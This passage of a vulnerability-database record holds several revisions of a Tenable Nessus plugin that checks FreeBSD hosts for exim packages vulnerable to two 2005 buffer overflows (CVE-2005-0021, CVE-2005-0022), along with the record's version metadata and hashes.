other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 8, "lastseen": "2019-01-16T20:06:13"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 2, "enchantments": {}, "hash": "50faaf8e0845e75d760b93b942ea8f104c7d7030add8a85a58222b382d9c817f", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2016-12-09T05:37:29", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.2", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2016-12-09T05:37:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ce6c77754f241a397e5d44de94decf8e2a0d0184b56b6b00eebebbf31607793d", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-09-02T00:04:23", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:04:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 1, "hash": "7fb65d202fb1c28819bcff4ec9818a73806836c6ab0b9a371be8daa946888296", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b540797a005019f00f860d4babc60dab", "key": "modified"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "e39e9975e39879e64809b73ac9d0e959", "key": "sourceData"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2016-09-26T17:26:09", "modified": "2013-06-22T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.2", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2013/06/22 00:10:42 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", 